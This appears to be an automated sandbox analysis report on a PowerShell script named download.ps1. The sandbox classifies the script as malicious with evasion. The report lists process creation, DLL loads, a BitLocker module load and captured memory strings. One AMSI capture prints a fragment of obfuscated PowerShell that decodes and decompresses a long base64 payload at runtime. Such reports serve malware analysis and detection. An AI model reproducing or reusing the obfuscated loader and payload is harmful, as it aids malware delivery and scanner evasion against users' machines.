Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],l=e,n=0;n<k.length;n++)if(l=l[k[n]],l==null){h=null;break a}h=l}var p=h&&h[610401301];g=p!=null?p:!1;var q,r=e.navigator;q=r?r.userAgentData||null:null;function t(a){return g?q?q.brands.some(function(c){return(c=c.brand)&&c.indexOf(a)!=-1}):!1:!1}function u(a){var c;a:{if(c=e.navigator)if(c=c.userAgent)break a;c=""}return c.indexOf(a)!=-1};function v(){return g?!!q&&q.brands.length>0:!1}function w(){return u("Safari")&&!(x()||(v()?0:u("Coast"))||(v()?0:u("Opera"))||(v()?0:u("Edge"))||(v()?t("Microsoft Edge"):u("Edg/"))||(v()?t("Opera"):u("OPR"))||u("Firefox")||u("FxiOS")||u("Silk")||u("Android"))}function x(){return v()?t("Chromium"):(u("Chrome")||u("CriOS"))&&!(v()?0:u("Edge"))||u("Silk")}function y(){return u("Android")&&!(x()||AAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=gbtcb></span><ol class=gbtc><li class=gbt><a target=_top href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAAQ" onclick="gbar.logger.il(9,{l:'i'})" id=gb_70 class=gbgt><span class=gbtb2></span><span id=gbgs4 class=gbts><span id=gbi4s1>Sign in</span></span></a></li><li class="gbt gbtb"><span class=gbts></span></li><li class=gbt><a class=gbgt id=gbg5 href="http://www.google.com/preferences?hl=en" title="Options" aria-haspopup=true aria-owns=gbd5><span class=gbtb2></span><span id=gbgs5 class=gbts><span id=gbi5></span></span></a><script nonce='QRSgWh_fnsVpcixOprXVSA'>document.getElementById('gbg5').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class="gbkp gbmtc"><a class=gbmt href="http://www.google.com/history/optout?hl=en">Web History</a></li></ol></div></div></li></ol></div></div><div id=gbx3></div><div id=gbx4></div><script nonce='QRSgWh_fnsVpcixOprXVSA'>window.gbar&&gbar.elp&&gbar.elp()</script></div></div><center><br clear="all" id="lgpd"><div id="XjhHGf"><img alt="Google" height="92" src="/images/branding
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lrasqh4.is5.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $vws3l6gj5oybp1t.(([system.String]::new(@((3501-(4859110/1415)),(-7147+(6212+1046)),(332864/2972),(352715/(8422-(-1154+6661))),(-3618+(32659044/8822)),(-3992+(-3127+7230))))))( $lmwog3a4byc7z5d ) $vws3l6gj5oybp1t.(([system.String]::new(@((412117/6151),(4341-4233),(149184/1344),(-426+541),(941421/9321)))))()$gjpcd91vshno372.(([char[]]@((654657/9771),(-9956+(99804688/9917)),(305694/(9256-6502)),(705985/(2527+(11991840/3320))),(-8435+(306+8230))) -join ''))()[byte[]] $qk5tjuw9ngo0xf1 = $lmwog3a4byc7z5d.(([system.String]::new(@((838656/9984),(8216-(4887315/(4612950/(105+(11294-(13784-10035)))))),(-239+(324976/1069)),(-6170+6284),(1025544/(9908-(-505+1417))),(800153/(14695-6446)),(582978/(9270-4452))))))() $2kz9pblfo8ruq1d=$qk5tjuw9ngo0xf1 return $2kz9pblfo8ruq1d}[System.Text.Encoding]::ascii.(([system.String]::new(@((8987-8916),(-5126+(5796743/1109)),(-9947+(17989-(23262810/(11120-8185)))),(215800/(10283000/3955)),(7513-(1791+5606)),(-8929+(22191522/2454)),(-3550+3655),(-3921+(5973-1942)),(-7694+(4389711/(-6151+6714)))))))((guzwyhi85ros4cblt9jmdxpq7n2 "Lup/ZGhrMjdxZo316O9rMxrtnXo1iWh561IiqiGN6yBk4jXlDN+FaAg2ynVlaqpDo6zS/wI9ubzREc+e9qgdUv99dzbjYqg0rPS8XXmUICbcyVYUVJ7pWBIdTMir1Vf3DxiPjK+omcyO3R+S5ppw8++4wYRygV/uzIq0+fvMPemZqac1bb+qmo+VAsii7Yf3Dh4GHbA0TkzNEYAViNrKmYBHhYCq20Saw9EIGpOw8fKcv5uGjpiRCJcByViuC5ccX1Sbmtpml3HC4iyQiq6yqbNS1N/SslO1wDi+qaewakTs0B2QCQ48DwbljM6oKD9NP8kevabVhgMYG3PcZXbhyZ9SQk8/s6+z8/PUz9OeCfbSX0HGuuedF8agBEIigNjibPScERVzcRiog44ZBijI/AOeiH2/Q/S1S7bw5SOlE6HfZUD9DwwcrrTd1ailGmbRxDftjyMDl7gOruES9gzwvFFVZCnYF3uTZA5WXxZ8mLymUP3/Wsky63Agq117Dw+XiBj2bwNTpSPou2ZGCzyBRRskHmrp28vY6KSRtIv/buEqxfMQ6wfhC2ZSCYw4iXqO+syypPoeaamv++twjMoLfpD+r/7ChB62WtcKCUHPF3PqCi/0Ogym/YX5k4X9VeN0acvhP4Pl51ESnwAv3BPdeHgAU1qTsDKYobqNsN5maD6Dyr65afsl1t+kUZkmTHYuXIZQg88MKWEWJYT8AwompnwWg3QMSN+xqI1/+CITpmuBH1sy1wwfRc2/ujcb4aWKaDJUBuowuuXDuH3A7yzyab7xgvEWoeN1+jnmNJAKaVXuPgeOqgo8huaG+faAUlfS1sfdxl3RItFjPSHO38AgiRUal0RqzxxSUk8GKjG8ubKNg8vHjhLndksa9O8mz7zE31mBrkXaRqJYREYLwzIb2Xf8gydxilsIFJVk3a6KE9IlcAdLCpL0tltPaYW/tQFMcrIiV8H6pa/M+eVGqt7qO5SsjzD6gUe1TtMIFLCXjs6bp9sSJr7omIeNZRmDs5X+ni94a3YEfTli8cO0/j6qns/0nRcQVdcW7Q0u2PC3fk/S+/npZ8F8cHLy4GSnG8fTyJiTiL2W4bxqeOcSz5WCp0+Q2xkqgwnbvtxjthqwJm8gN3N3yghsHiBRsvKiy9Yf4jfIZVChoM7oGM7X11eyJEqnaZIelpZhSOMlBk4eOvrjarQLEQ00rDnUwiHcQkv0secUAob9n3Jt5+8Dn6Uua+a+P9e9og4dCqUENzuZ67qauuG1jrmoHxIMwdyyzUubwb/E85NwrKlJh0GxvYX3amiuM7+wXcrKFCDsdkRGh6EEP9dioHMrSGqnFAOWnmoVOxSWjZKMXXDOHvu0sQ3eXhhS9J5/g1UQaOWnbaHfyje91AYafOTCkcacPr/hyrXAvLpXCdAggHCUvWr38Yf48+CUfGmJlsSY6tKgK4YFv6KLgcGAKx/sSwhI/XUBow05k9kRg/sODpeZnmNPJ2dcwAQSJtfmb75Z8UFIOeNPYyHoJmnrMGFYoDz9dictRP19PHwF/jOcMRjMDKcL3KzHQFAdkfJJA7qmWeEPFupLNdVlzKSrMcucMOXL1H9OVsFDIWWao/E5mWRUHazbgFv109L+HKPnuUWWDG7qDppYgpW5qfxmRvYKkRukkzoFTYhmOQa79NL7i/Rf2yN4lFNCc9uqOoDs33CmMrqWdyAmuXZX9G4ifCjIhoR+pEGryDDVoxxZfhZqnnYRfnnzeEpGikjjPY0eBs/1+EISRAFlMoUiQzd5OrCutip1QTB2n0hakZ64G7a2htBuiDVgYGTLxQ77gzoLQT1FiHr3PkNpkEOE4yZPsBbxTX29WcFC8j5tfo8zYRrgcERUCR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb6 source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb?W source: powershell.exe, 00000000.00000002.1777765113.00000287F3F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbdb\ source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B67D2A5 pushad ; iretd 0_2_00007FFD9B67D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A0394 push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A030D push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A02BD push cs; ret 0_2_00007FFD9B7A03D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B790952 push E95B6FD0h; ret 0_2_00007FFD9B7909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7900BD pushad ; iretd 0_2_00007FFD9B7900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B794FAB push ecx; ret 0_2_00007FFD9B794FAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B861920 push eax; ret 0_2_00007FFD9B861921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BA46E14 push es; iretd 0_2_00007FFD9BA46E17

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
